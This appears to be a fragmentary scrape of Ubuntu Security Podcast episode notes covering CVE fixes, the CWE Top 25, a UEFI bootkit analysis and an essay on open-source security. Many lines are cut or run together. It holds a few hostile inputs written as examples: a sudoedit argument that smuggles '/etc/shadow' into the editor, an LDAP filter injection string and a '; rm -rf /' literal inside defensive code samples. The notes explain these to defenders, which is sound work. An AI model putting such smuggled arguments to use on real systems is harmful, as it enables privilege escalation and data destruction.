This week we look at the top 25 most dangerous vulnerability types, as well as the announcement of the program for LSS EU, and we cover security updates for Bind, the Linux kernel, CUPS, etcd and more.
36 unique CVEs addressed
warn
or higher -
could then either cause a crash (SEGV etc) or could potentially end up logging
sensitive info if that was then present in that memory location
Rank | ID | Name | Score | CVEs in KEV |
---|---|---|---|---|
1 | CWE-787 | Out-of-bounds Write | 63.72 | 70 |
2 | CWE-79 | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) | 45.54 | 4 |
3 | CWE-89 | Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) | 34.27 | 6 |
4 | CWE-416 | Use After Free | 16.71 | 44 |
5 | CWE-78 | Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) | 15.65 | 23 |
6 | CWE-20 | Improper Input Validation | 15.50 | 35 |
7 | CWE-125 | Out-of-bounds Read | 14.60 | 2 |
8 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) | 14.11 | 16 |
9 | CWE-352 | Cross-Site Request Forgery (CSRF) | 11.73 | 0 |
10 | CWE-434 | Unrestricted Upload of File with Dangerous Type | 10.41 | 5 |
11 | CWE-862 | Missing Authorization | 6.90 | 0 |
12 | CWE-476 | NULL Pointer Dereference | 6.59 | 0 |
13 | CWE-287 | Improper Authentication | 6.39 | 10 |
14 | CWE-190 | Integer Overflow or Wraparound | 5.89 | 4 |
15 | CWE-502 | Deserialization of Untrusted Data | 5.56 | 14 |
16 | CWE-77 | Improper Neutralization of Special Elements used in a Command (‘Command Injection’) | 4.95 | 4 |
17 | CWE-119 | Improper Restriction of Operations within the Bounds of a Memory Buffer | 4.75 | 7 |
18 | CWE-798 | Use of Hard-coded Credentials | 4.57 | 2 |
19 | CWE-918 | Server-Side Request Forgery (SSRF) | 4.56 | 16 |
20 | CWE-306 | Missing Authentication for Critical Function | 3.78 | 8 |
21 | CWE-362 | Concurrent Execution using Shared Resource with Improper Synchronization (‘Race Condition’) | 3.53 | 8 |
22 | CWE-269 | Improper Privilege Management | 3.31 | 5 |
23 | CWE-94 | Improper Control of Generation of Code (‘Code Injection’) | 3.30 | 6 |
24 | CWE-863 | Incorrect Authorization | 3.16 | 0 |
25 | CWE-276 | Incorrect Default Permissions | 3.16 | 0 |
For our 200th episode, we discuss the impact of Red Hat’s decision to stop publicly releasing the RHEL source code, plus we cover security updates for libX11, GNU SASL, QEMU, VLC, pngcheck, the Linux kernel and a whole lot more.
73 unique CVEs addressed
PTcrop
utility which could be abused to execute arbitrary code etc
apt upgrade
or use
unattended-upgrades
to install security updates as this will upgrade all
installed binary packages to all the newer versions, and not say just apt install sssd
which would only pull in some of the binary packages
podman play kube
to create containers / pods / volumes based on a
k8s yaml, it would always pull in the k8s.gcr.io/pause
image - this is not
necessary and is not necessarily maintained and so could present a security issue as a result
7 CVEs addressed in Jammy (22.04 LTS)
6.1 OEM
OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver
requires a malicious USB device to be plugged into your machine to be able to trigger (shout out to USBGuard)
OOB write in network queuing scheduler
Kernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 95.4 | 95.4 | — |
aws-5.15 | — | 95.4 | — |
aws-5.4 | — | — | 95.4 |
azure | 95.4 | 95.4 | — |
azure-5.4 | — | — | 95.4 |
gcp | 95.4 | 95.4 | — |
gcp-5.15 | — | 95.4 | — |
gcp-5.4 | — | — | 95.4 |
generic-5.4 | — | 95.4 | 95.4 |
gke | 95.4 | 95.4 | — |
gke-5.15 | — | 95.4 | — |
gke-5.4 | — | — | 95.4 |
gkeop | — | 95.4 | — |
gkeop-5.4 | — | — | 95.4 |
ibm | 95.4 | 95.4 | — |
ibm-5.4 | — | — | 95.4 |
linux | 95.4 | — | — |
lowlatency | 95.1 | — | — |
lowlatency-5.4 | — | 95.4 | 95.4 |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
For our 199th episode Andrei looks at Fuzzing Configurations of Program Options
plus we discuss Google’s findings on the io_uring
kernel subsystem and we look
at vulnerability fixes for Netatalk, Jupyter Core, Vim, SSSD, GNU binutils, GLib
and more.
53 unique CVEs addressed
Subject DN
field - this
would then be used directly in the query and would be interpreted as
parameters in the LDAP query - could then allow a malicious client to provide
a crafted certificate which performs arbitrary LDAP queries etc - such that
when used in conjunction with FreeIPA they could elevate their privileges
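A sketch of the general mitigation concept (not SSSD’s actual fix, and ldap_escape is a hypothetical helper) - escape the RFC 4515 special characters before splicing untrusted certificate fields into an LDAP filter:
#include <stdio.h>
#include <string.h>

static void ldap_escape(const char *in, char *out, size_t outsz)
{
    size_t j = 0;
    for (size_t i = 0; in[i] != '\0' && j + 4 < outsz; i++) {
        if (strchr("*()\\", in[i]))
            j += snprintf(out + j, outsz - j, "\\%02x", (unsigned char)in[i]);
        else
            out[j++] = in[i];
    }
    out[j] = '\0';
}

int main(void)
{
    char safe[256];
    ldap_escape("admin)(uid=*", safe, sizeof(safe)); /* injection attempt */
    printf("(uid=%s)\n", safe); /* -> (uid=admin\29\28uid=\2a) */
    return 0;
}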
io_uring in ChromeOS and their production servers (12:00)
io_uring
- with around
$1m USD rewarded for io_uring
submissions alone - and io_uring
was used in all
submissions which bypassed their mitigations
io_uring
in ChromeOS (was originally enabled back in
November 2022 to increase performance of their arcvm
which is used to run
Android apps on ChromeOS) but then now disabled 4 months later in Feb this
year
io_uring
to Android applications and in the
future will also use SELinux to restrict access even further to only select
system processes
io_uring
on their production servers
io_uring
and ongoing development of features
for it, it presents too much of a risk for use by untrusted applications etc
This week we investigate the mystery of failing GPG signatures for the 16.04 ISO images, plus we look at security updates for CUPS, Avahi, the Linux kernel, FRR, Go and more.
58 unique CVEs addressed
cupsd.conf
to have LogLevel
as debug
which is not usually the caseCPAN
and HTTP::Tiny
`
for JS
etc)xdg-open
- so could
call xdg-open
with crafted input that would then get passed through to
whatever application (like say the browser / file manager etc) and hence could
run these other applications with arbitrary arguments - e.g. could embed a
link in a PDF and when the user clicks this can then get say the browser to be
launched with arbitrary arguments
--remote-allow-origins
flag to specify an attacker
controlled domain which is then allowed to connect to the local debugging port
and hence execute arbitrary JS on any other domain - steal creds etc
SETTINGS frames would cause a CPU-based DoS - mitigated by setting a max limit for these frame types and rejecting if too large
apt) we take a hash of the ISO file and then sign the file containing that list of hashes - for performance
SHA256SUMS
file has been modified
and so does not validate properly/usr/share/keyrings/ubuntu-archive-keyring.gpg
file from the ubuntu-keyring
packagewget -q https://old-releases.ubuntu.com/releases/xenial/SHA256SUMS{,.gpg}
gpg --verify --no-default-keyring --keyring=/usr/share/keyrings/ubuntu-archive-keyring.gpg --verbose SHA256SUMS.gpg SHA256SUMS
gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
gpg: using DSA key 46181433FBB75451
gpg: Can't check signature: No public key
gpg: Signature made Fri 01 Mar 2019 02:56:07 ACDT
gpg: using RSA key D94AA3F0EFE21092
gpg: using pgp trust model
gpg: BAD signature from "Ubuntu CD Image Automatic Signing Key (2012) <[email protected]>" [unknown]
gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
SHA256SUMS
file was modified
vorlon
from Foundations confirmed this was the case
gpg: Signature made Fri 09 Jun 2023 00:38:30 ACST
gpg: using RSA key 843938DF228D22F7B3742BC0D94AA3F0EFE21092
gpg: using pgp trust model
gpg: Good signature from "Ubuntu CD Image Automatic Signing Key (2012) <[email protected]>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 8439 38DF 228D 22F7 B374 2BC0 D94A A3F0 EFE2 1092
gpg: binary signature, digest algorithm SHA512, key algorithm rsa4096
The venerable Ubuntu 18.04 LTS release has transitioned into ESM, plus we look at Till Kamppeter’s excellent guide on how to set up your GitHub projects to receive private vulnerability reports, and we cover the week in security updates including PostgreSQL, Jhead, the Linux kernel, Linux PTP, snapd and a whole lot more.
56 unique CVEs addressed
CREATE
privileges - could then allow an auth user to execute arbitrary code as
the bootstrap superuser - the other in row security properties which could allow a user to bypass policies and get read/write access contrary to the security policy.
but can get this in an unprivileged user namespace ∴
can be triggered OOTB by an unpriv user on UbuntuVary:Cookie
header - requires the use of a caching proxy
and other conditions though so may not be a widespread issuessl_Verify
- parameter to
<:Tiny>nth-child()
and nth-last-of-type()
functions) - can pass it a string and it
will compile that to an optimised function for calling by other codefree()
or realloc()
on crafted messages - both only really an issue if parsing untrusted contentTIOCLINUX
ioctl()
request - could allow a snap to inject contents into the
controlling terminal when run on a virtual console - this would then be
executed when the snap finished running -> code exec outside the snap sandbox
TIOCLINUX
as it already did for TIOCSTI
in the past
TIOCSTI
CVEs such as CVE-2016-9016 in firejail,
CVE-2016-10124 in lxc, CVE-2017-5226 in bubblewrap, CVE-2019-10063 in flatpak
This week we look at some recent security developments from PyPI, the Linux Security Summit North America and the pending transition of Ubuntu 18.04 to ESM, plus we cover security updates for cups-filter, the Linux kernel, Git, runC, ncurses, cloud-init and more.
83 unique CVEs addressed
system()
to run a command
which contained various values that can be controlled by the attacker
fork()
and execve()
plus some other smaller changes
to perform sanitisation of the input
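A minimal sketch of that fix pattern (illustrative, not the exact cups-filters patch) - with fork() and execve() no shell ever parses the attacker-controlled values:
#include <sys/wait.h>
#include <unistd.h>

static int run_helper(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const envp[] = { NULL }; /* minimal, controlled environment */
        execve(path, argv, envp); /* argv is never parsed by a shell */
        _exit(127); /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* "; rm -rf /" stays a harmless literal argument here */
    char *const argv[] = { "/bin/echo", "; rm -rf /", NULL };
    return run_helper("/bin/echo", argv);
}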
.gitmodules file with submodule URLs longer than 1024
chars - could inject arbitrary config into the user’s git config - eg. could configure the pager or editor etc to run some arbitrary command
git apply --reject
TERMINFO or through ~/.terminfo - will get used by a setuid binary as well - turns out though that ncurses has a build-time configuration option to disable the use of custom terminfo/termcap when running - fixed this by enabling that
Securing PyPI accounts via Two-Factor Authentication
Alex and Camila discuss security update management strategies after a recent outage at Datadog was attributed to a security update for systemd on Ubuntu, plus we look at security vulnerabilities in the Linux kernel, OpenStack, Synapse, OpenJDK and more.
66 unique CVEs addressed
io_uring
io_uring
, logic issue in OverlayFS
([USN-6057-1] Linux kernel
(Intel IoTG) vulnerabilities from Episode 194), race-condition in the handling of copy-on-write read-only shared memory mappings - unpriv user could then get write on these read-only mappings -> privesc
io_uring, logic issue in OverlayFS
The team are back from Prague and bring with them a new segment, drilling into recent academic research in the cybersecurity space - for this inaugural segment new team member Andrei looks at modelling of attacks against network intrusion detection systems, plus we cover the week in security updates looking at vulnerabilities in Django, Ruby, Linux kernel, Erlang, OpenStack and more.
57 unique CVEs addressed
'{verify, verify_peer}'
SSL option)
intel-microcode
, nvme-cli
, various graphics drivers etc)
io_uring
The release of Ubuntu 23.04 Lunar Lobster is nigh so we take a look at some of the things the security team has been doing along the way, plus it’s our 6000th USN so we look back at the last 19 years of USNs whilst covering security updates for the Linux kernel, Emacs, Irssi, Sudo, Firefox and more.
109 unique CVEs addressed
malloc()
/ free()
- would then trigger the memory checking of libc
which detected thissudoreplay
(can
be used to list or play back the commands executed in a sudo session) - and so
could allow an attacker to get code execution as the user running sudoreplay
by injecting terminal control characters.
.desktop
files - could allow an attacker to get code execution as
the user running firefox - interesting to note that as a snap, firefox is
confined by default and cannot execute arbitrary commands from the host
system - can only use binaries from within the firefox
snap itself or the
user’s $HOME
which makes exploitation of such an issue harder since there are fewer
LOLBins to make use of
io_uring
mediation support in AppArmordm-verity
within snapd for
improved integrity of snapsUbuntu gets pwned at Pwn2Own 2023, plus we cover security updates for vulns in GitPython, object-path, amanda, url-parse and the Linux kernel - and we mention the recording of Alex’s Everything Open 2023 presentation as well.
91 unique CVEs addressed
mod_proxy
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 |
---|---|---|---|---|
aws | 93.1 | 93.1 | 93.1 | — |
aws-5.15 | — | 93.1 | — | — |
aws-5.4 | — | — | 93.1 | — |
aws-hwe | — | — | — | 93.1 |
azure | 93.1 | 93.1 | — | 93.1 |
azure-4.15 | — | — | 93.1 | — |
azure-5.4 | — | — | 93.1 | — |
gcp | 93.2 | 93.1 | — | 93.1 |
gcp-4.15 | — | — | 93.1 | — |
gcp-5.15 | — | 93.2 | — | — |
gcp-5.4 | — | — | 93.1 | — |
generic-4.15 | — | — | 93.1 | 93.1 |
generic-5.4 | — | 93.1 | 93.1 | — |
gke | 93.2 | 93.1 | — | — |
gke-4.15 | — | — | 93.1 | — |
gke-5.15 | — | 93.2 | — | — |
gke-5.4 | — | — | 93.1 | — |
gkeop | — | 93.1 | — | — |
gkeop-5.4 | — | — | 93.1 | — |
ibm | 93.1 | 93.1 | — | — |
linux | 93.1 | — | — | — |
lowlatency-4.15 | — | — | 93.1 | 93.1 |
lowlatency-5.4 | — | 93.1 | 93.1 | — |
oem | — | — | 93.1 | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
io_uring
and large attack surfaces through unprivileged user
namespaces perhaps make Ubuntu more of an easy target
Ubuntu is one of the most popular Linux distributions and is used by millions of people all over the world. It contains software from a wide array of different upstream projects and communities across a number of different language ecosystems. Ubuntu also aims to provide the best user experience for consuming all these various pieces of software, whilst being both as secure and usable as possible.
The Ubuntu Security team is responsible for keeping all of this software secure and patched against known vulnerabilities, as well as proactively looking for new possible security issues, and finally for ensuring the distribution as a whole is secured through proactive hardening work. They also have a huge depth of experience in working with upstream open source projects to report, manage, patch and disclose security vulnerabilities. Find out both how they keep Ubuntu secure and how you can improve the security of your own open source project or the projects you contribute to.
This week saw the unexpected release of Ubuntu 20.04.6 so we go into the detail behind that, plus we talk Everything Open and we cover security updates including Emacs, LibreCAD, Python, vim and more.
82 unique CVEs addressed
file
on it - but would fail to escape the filename - so if a user
could be tricked into running htmlfontify-copy-and-link-dir
on a crafted
directory, could get code execution in the context of emacs
mail
command - original
patch didn’t fix properly so second CVE was issued for the fix
urllib.parse()
simply by prefixing the URL
with a space - blocklisting is not part of upstream functionality but often
would be implemented in application / library logic by first using urlparse()
to parse the given URL - if prefixed with a space then can get urlparse()
to
fail to return the correct scheme/hostname - can work around simply by first calling strip() on the URL - apparently upstream still discussing whether the current fix is sufficient so watch this space
Unlike previous point releases, 20.04.6 is a refresh of the amd64 installer media after recent key revocations, re-enabling their usage on Secure Boot enabled systems.
Many other security updates for additional high-impact bug fixes are also included, with a focus on maintaining stability and compatibility with Ubuntu 20.04 LTS.
cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
sbat,1,2022052400
grub,2
objdump -j .sbat -s grubx64.efi
The Ubuntu Security Podcast is on a two week break to focus on Everything Open 2023 in Melbourne next week - come hear Alex talk about Securing a distribution and securing your own open source project in person if you can.
This week we dive into the BlackLotus UEFI bootkit teardown and find out how this malware has some roots in the FOSS ecosystem, plus we look at security updates for the Linux kernel, DCMTK, ZoneMinder, Python, tar and more.
111 unique CVEs addressed
shim
and grub
- but not because they are exploiting any vulnerabilities in them,
but since they are very useful components if you want to boot your own
bootkitshim
and grub
) - but also a copy of a vulnerable
version of the Windows Boot Manager UEFI binary plus their own custom boot
configuration data - and since they have disabled BitLocker already these
will happily be loaded at next boot without the usual integrity checks etcgrub
is signed using this key whilst the shim
is Red Hat’s shim
-
unmodified and signed by Microsoft and hence trusted - this will then trust
their malicious grub
as it is signed by the key they just enrolled in the
MOKshim
is an unmodified copy, their grub
is not - and is actually
maliciousshim
then goes on to boot this malicious grub
which starts Windows but also
installs a bunch of UEFI memory hooks to be able to subvert further stages
of the boot process and eventually Windows itselfshim
in the future - perhaps, but it is not really shim
that
is at fault here - the issue is the original vulnerability in the Windows
Boot Manager - shim
just helps to make loading additional parts of their
bootkit easier (along with grub
) - so hopefully Microsoft don’t go down that
path
shim
’s did get revoked - but
revoking this Microsoft binary would mean many older systems may fail to
boot, including their recovery images and install media etc
This week the common theme is vulnerabilities in setuid-root binaries and their
use of environment variables, so we take a look at a great blog post from the
Trail of Bits team about one such example in the venerable chfn
plus we look at
some security vulnerabilities in, and updates for the Linux kernel, Go Text, the
X Server and more, and finally we cover the recent announcement of Ubuntu
22.04.2 LTS.
75 unique CVEs addressed
PATH
environment variable could get it to
execute their binaries instead - particularly could be an issue if a setuid()
binary uses libxpm - and this is mentioned in the glibc manual around tips for
writing setuid programs
chfn
as
implemented by the util-linux
package - used the readline
library for input
handling by many CLI applications - as a result, able to be abused to read the
contents of a root-owned SSH private key
chfn
binary (which is used to set info about the current user in
/etc/passwd
) would use the readline library just to read input from the user -
by default readline
will parse its configuration from the INPUTRC
environment
variable
INPUTRC
to point to that file and execute chfn
and it will then go parse
that - however, the file first has to appear close to the format which is
expected - and it just so happens that SSH private keys fit this bill
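One defensive pattern for setuid binaries (a sketch using glibc’s secure_getenv(), not the actual util-linux fix) is to ignore such environment variables whenever running with elevated privileges:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    /* secure_getenv() returns NULL when running setuid/setgid, so an
       attacker-supplied INPUTRC is ignored rather than parsed */
    const char *inputrc = secure_getenv("INPUTRC");
    if (inputrc == NULL)
        inputrc = "/etc/inputrc"; /* fall back to a trusted default */
    printf("using readline config: %s\n", inputrc);
    return 0;
}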
chfn comes from the standalone passwd package, not util-linux - and the chfn from passwd didn’t use readline
gnome-initial-setup
- previously this
was only Livepatch, but can now enable any of the Ubuntu Pro offerings as
soon as you log in for the first time.
After the announcement of Ubuntu Pro GA last week, we take the time to dispel some myths around all things Ubuntu Pro, esm-apps and apt etc, plus Camila sits down with Mark and David to discuss the backstory of Editorconfig CVE-2023-0341 and we also have a brief summary of the security updates from the past week.
https://www.theregister.com/2022/10/13/canonical_ubuntu_ad/
https://www.omgubuntu.co.uk/2022/10/ubuntu-pro-terminal-ad
https://news.ycombinator.com/item?id=33260896
But there have been a lot of users expressing a lot of emotion over the appearance now of the new ‘advertisement’ for Ubuntu Pro / esm-apps when they run apt update, e.g.:
The following security updates require Ubuntu Pro with 'esm-apps' enabled:
python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
Learn more about Ubuntu Pro at https://ubuntu.com/pro
There appears to be a few main issues:
So let’s take some time to look into these issues:
pro config set apt_news False
esm-apps
part of this message indicates that
these updates are for packages in the Universe component of the Ubuntu
archive - previously this has only ever been community supported - and
so the Ubuntu Security team would only ever provide security updates on
rare occasions OR if a member of the community came along and provided
an update in the form of a debdiff which could be sponsored by someone
from the Ubuntu Security team
64 unique CVEs addressed
The Ubuntu Security Podcast is back for 2023! We ease into the year with coverage of the recently announced launch of Ubuntu Pro as GA, plus we look at some recent vulns in git, sudo, OpenSSL and more.
212 unique CVEs addressed
.gitattributes
SUDO_EDITOR
,
VISUAL
or EDITOR
- these would normally specify the binary of the editor to
use--
EDITOR=vim -- /etc/shadow
- then when sudoedit
launches the editor for the originally specified file, would also launch it
with this file too/etc/sudoers
- ie since
could be configured to only allow a user to edit say the apache config via
sudoedit
The following security updates require Ubuntu Pro with 'esm-apps' enabled:
python2.7-minimal python2.7 libpython2.7-minimal libpython2.7-stdlib
Learn more about Ubuntu Pro at https://ubuntu.com/pro
For our final episode of 2022, Camila is back with a special holiday themed discussion of the security of open source code, plus we hint at what is in store for the podcast for 2023 and we cover some recent security updates including Python, PostgreSQL, Squid and more.
54 unique CVEs addressed
3xx
redirect header with a crafted Location could trigger
this bugVary
header
Hello listener! It has been a while since I last showed up here to share with you some of my thoughts and spread the knowledge, and today I am back in order to try to fix that, remove the void I have left in the hearts of those that enjoy listening to me rambling about a certain cyber security topic. That being said, I recorded my first podcast segment during the holiday season last year, and I thought it would be very poetic to return at the same time this year to record once again. Especially after I was struck with inspiration after spending a little time with my family. Nothing more fitting for this once again holiday episode, considering it is the time of the year - the most wonderful one - when we usually enjoy mingling and celebrating with family and friends. The time of the year where we meet in order to eat some good food, spend some quality time together, catch up on life, share the joy… and answer the always asked question by someone who knows you work with computers: “Do you think it’s a virus?”. “Yes, uncle, it probably is, since the link you clicked on that said ‘Free 1000 dollar Christmas vouchers for the first 10 clicks’ is most likely a scam. But hey, I gotta go now, because it is time for some delicious holiday season desserts! Your computer can survive a few more hours doing some cryptomining for some random hacker, so I’ll check on that later for you”. Anyway, surprising as it may be, this actually was not the topic of conversation that brought me here today, although I fully expect the previously mentioned question to come my way whenever I do meet my family for the end of the year festivities of 2022. Instead, I was asked a question that would probably have my holiday treats wait for me a little bit longer, since it is one I find compelling to answer, and one that I thought would be actually interesting to share the answer to, so that you can take it to your holiday meetings as a hot topic of conversation…you know…show off a little bit to the ones you love.
So…to elaborate a little bit more on my story and on this so far mysterious question…while sipping on some delicious cocoa surrounded by some fairy lights and the cold air - even though it is summer during the end of the year where I live…I see you, southern hemisphere. I was traveling when this happened - my dearest not-in-the-IT-field family member asked me the following question while we had a conversation about my job: “how is it possible to have security in a software when the code for that software is available for all to see on the Internet?”. Running a prettify function on this question, we can word it as: “how can open source software be secure if the code is public?”. And that, family and friends, is the question that we wish to answer today. I already answered my family member, but now, I want to do it the fancy way, the holiday spirit way! So gather around with your drinks and delicious appetizers, and before we head for dinner, and of course, dessert, let’s think about the year we leave behind, the code that was a part of it, and why, in the year of 2022, can this code be secure when everyone knows exactly what it is.
Let’s begin this beautiful holiday sharing moment by actually talking about what is open source software and what is NOT open source software, as well as why one would think that the former is less secure than the latter. To keep it simple: open source software is the kind of software where the source code, a.k.a. the instructions that will be transformed into the computer program that you will later use, is publicly available for all to see. Those that wish to do so can inspect this software’s code to know exactly how it does what it does. They can use it freely if following its license terms, and they can even modify it, maybe change its functionalities, be it through creation of a copy of that code that branches from the original version, or be it with authorization from the creator/maintainer of the software to edit the original version wherever it is being maintained. A beautiful example to bring this all together in your mind: almost all software packages in Ubuntu are open source. The programs you run in your Ubuntu OS come from code that is publicly available for all to access through the loveliest Internet. For many packages, it is possible to choose one from main or universe, for example, and find its code in a repository after a quick web search. Even quicker: you can download the source code related to the executables and libraries apt installs in your Ubuntu OS when you run ‘apt-get install <insert-package-name-here>’ by running ‘apt-get source <insert-package-name-here>’ instead. Please remember to replace <insert-package-name-here> with the actual package name if you’re gonna try to do this. Anyway, this package you download with apt may have its code differ a little bit from the original code for that software package, the one maintained by its creator or any successors, also known as the upstream code, and that may happen for various reasons, which I will not go too much further into here, however, to put it directly: this code associated with the package will most likely have its regular upstream maintainers, with a lot of them also accepting contributions from people that might use this software, care about its wellbeing or even…its security, and the source code in an Ubuntu package will be nothing more than a copy of an upstream version that is being contributed to by the Ubuntu teams and the Ubuntu community. Very much in the holiday spirit, one of the ideas of open source is to have people collaborate on software, as well as have software be shared with those that wish to use it, sometimes with changes.
Moving on…on the other side of our coin, we have non-open source software, also known as closed source software, which is software for which the source code is not publicly available for all to inspect, use or modify. Closed source software has its source code protected, with only an authorized group of people - who are usually a part of the organization that developed said software or that is currently maintaining it after taking responsibility for it at a certain point in time - having access to this source code, be it to change the source code or to simply look at it and know what it is. Closed software is usually not free to use and users that wish to have access to the software and its functionalities will only be able to obtain a final executable version of it, where it is very difficult to acquire information on the source…unless you are very determined, but more on that later. For now, know that closed source software will allow you to execute it, but you can’t know what you are executing unless you do some very intense digging. As for an example…let’s put it this way, so that you can fill in the blanks: if Ubuntu is a door and the doors are open, then that must mean that the Windows are … . And there you have your answer. I mean…it is the holiday season and we would rather have our guests come in to celebrate through the door instead of any other way. And I say this because I want you to understand that there is no right or wrong when it comes to open source and closed source, there are only preferences and needs. There are situations where one will be more useful than the other, or where one might be preferred over the other. Who am I to judge if you let people into your house through your window, or your chimney? What actually matters to us here is: why is closed source usually considered something more secure “intuitively” when open source can be just as, or arguably, even more secure? So, let’s try to answer that question, shall we? When you think about wanting to protect something, you think about keeping it hidden, keeping it a secret. Wait…this is not nearly festive enough for a holiday episode. Let’s try again. When you don’t want someone to guess what is going to be the surprise holiday dessert you are serving by the end of dinner, you usually won’t tell them anything about it. You will hide the recipe, cook your dessert following that recipe, but only allow your guests to know what it is and eat it once the time is just right. After all, the holidays are all about each family’s tradition, and I know dessert eating schedules are definitely a part of it for many. Anyway, the point here is…if no one knows what the dessert is and they don’t have access to your house while you cook it, bake it, prepare it in general, they cannot copy this recipe to bring their own version of your dessert to your holiday celebration - or any other holiday celebration, for that matter - and they can only speculate on the ingredients once they eat it. And…since you kept your ingredients and your cooking utensils far away from messy hands while you prepared your dessert, no one can tamper with it, maybe steal a little bite before it is actually complete, or even add a missing ingredient without authorization. You keep your dessert “safe” by actually hiding it, allowing people access only when the final product is complete. 
As much as I love holiday season analogies, let’s put our cyber security glasses back on and see this situation from the closed source point of view: your recipe is your source code; you preparing the dessert is you editing, building and compiling the code to create an executable program; and this executable program is actually your final holiday dessert.
You’re not sharing your source code, meaning people cannot tamper with it, cannot create a bad copy of it and cannot inspect it in order to figure out possible failures or ways to exploit it. Yes, even I have fallen victim to the “too much sugar” mistake when baking stuff, but sometimes we can try to mask mistakes with other ingredients and no one will ever know…This can also be called security through obscurity, when you rely on secrecy and confidentiality in order to avoid the exposure of weaknesses and the direct targeting that may befall your software. How can a hacker actually exploit my code if they don’t know what the code is? That is the idea behind security through obscurity. I will not get into the details of whether security through obscurity is an effective practice or not, because that is a very intense and polarizing subject, and it is the holiday season…let’s leave the heated discussions for some other time. I will say, however, that it directly clashes with the open source premise, and it is one of the reasons that may be behind the choice of making software closed source. However, even though this might be a way to protect your software from exploitation and from vulnerability discovery, it is not a fool proof technique to avoid the really determined from figuring out what they want when they are trying to hack you. Talking once more about desserts, because they are delicious and a very pleasing analogy to consider…if you have, for example, a friend or family member that is a chef. They go to your holiday dinner party and then eat your dessert, which we will consider here as being a beautiful multilayered trifle. They eat your trifle and because they are so experienced in the art of cooking, they are able to tell all of the ingredients you have in your cream after tasting it. It is not a skill everyone possesses - discovering the trifle recipe is no trifle matter…one might say - and it is not something everyone will be looking forward to do…after all, some of us simply want to eat and enjoy the food, be the ingredients what they may. However, there might just be that someone that is willing and capable to go the extra mile to figure out your recipe…and let me tell you the bad news…there is not much you can do about it, because there is not much you can hide about your dessert if you intend to serve it for people to eat.
The same goes for code. Yes, it is possible to not share the source code of your software, but for a computer to run a software, it needs to follow the instructions that were transformed into the executable program that originated from the source code. So even if the executable does not contain the exact source code, it will contain something that can be extracted and analyzed by the brave and patient. Any program out there can be reverse engineered into its low level code version, and this low level code, mainly created to be machine readable code, when analyzed, will tell you more about what the source code could actually be. You are able to get from the final product to the actual recipe that led you to that product…even if the low level code will be very difficult to analyze and piece together in order to form something similar to what would be the original source code that generated it. But doubt not my friend…there are people out there that are willing to do this, and sometimes these people can be really, really good at it. So that is why security through obscurity can help, as it is one more barrier that a hacker needs to cross in order to be able to possibly tamper with a system, however, it is not an impenetrable one, and it will only stop those lazy enough to cross it…or those that maybe ate too much during dinner already and will pass on dessert.
Aah, holiday season food is delicious, isn’t it? Plus, I’m not the type to pass on dessert, and I am definitely not done talking about them, the holiday spirit and how it all relates to open source code quite yet, so let’s keep going. Hold on to that dessert analogy, because we will bring it back shortly. For now, we move on, understanding one reason why it might seem that closed source is safer or more secure than open source. Especially when you think about one of the main activities performed by the Ubuntu Security team, which is applying patches to vulnerabilities that are constantly being found in the source code of packages that can be installed in Ubuntu, or that are found in the core of Ubuntu, the kernel. Throughout all the seasons, including the holiday season, we fix issues that are being found by people from the community that look into and identify flaws in these packages, sometimes even unintentionally. We can see this as people finding problems with our recipe and pointing them out to us, forcing us to change it so that the end result will be something better, something that all can enjoy. “Hey, you have peanuts here, what about the people who have peanut allergies that will eat this?”…or…“Hey, if this is cooked in the southern hemisphere, where it is hot during the holiday season instead of cold, this rest time for the cream might be too much and it will be too much of a liquid by the time you want to put your trifle in its final container”. And while you listen to all these complaints and look at your recipe book, you might think it is all very annoying…having to change your recipe to fix all these problems…but when you actually think about it…is it not helpful instead? I mean…you don’t wanna kill grandma because you forgot she was allergic to peanuts, do you? Had you not made your recipe public, you might have not discovered that you had to change it…the bad way: by having grandma spit that trifle all over the floor and scold you because grandma might fall for phishing scams from time to time, but she knows better than to eat hidden peanuts in your trifle. Also…this is a podcast with positive vibes, so let’s not actually consider the worst of the worst situation here for grandma and for you as well… but you get the point.
Do not kid yourself by thinking that closed source software has less bugs than open source software. They might be encountered at a smaller rate, since analysis of the source code is something harder to do and can only be done by people with access to the code, however, they are there…and sometimes, people figure this out in the worst way possible: when they have already been hacked. And then it is a race to figure out where the bug that caused the issue is, so that it can be fixed. By making the source code public, people that are willing to help and are willing to make this code better, safer and more robust have the chance to actively participate in its development and improve the overall final product. One of the reasons why open source software came to be was exactly to provide users with more security, since it is easier to find hidden problems in that which has a lot of people auditing AND it is also easier to trust that which you can audit. Imagine if your prankster cousin wants to tamper with your dessert, and they add an extra bad ingredient to the recipe without your knowledge after you leave them a while with your recipe book…after all, you also need to prepare your holiday dinner. Anyway, if you had decided to hide your dessert recipe from everyone, people would only know something was incredibly wrong once they would have eaten it. Of course, if you were hiding it from everyone, you would have also hidden it from your prankster cousin and not shown them the recipe in the first place, but they could have just as easily found another way to get to it, and if they did a good job changing the recipe without your knowledge, you might not even know it had been tampered with at all. Shoutout to a well known comedy series in which someone adds some savory food to what is supposed to be a dessert trifle because they thought that was the correct recipe, when it was actually all a misunderstanding. The ones who know, will know… Of course, when you hide your recipe book well enough, it is not expected that the recipe will be tampered with, but sometimes, you yourself are the one doing the tampering…you holiday prankster, you! You want to play a prank on your friends and family during the holidays and decide to add something weird to your dessert. If your recipe is public, however, people are able to check for mistakes, and if they see 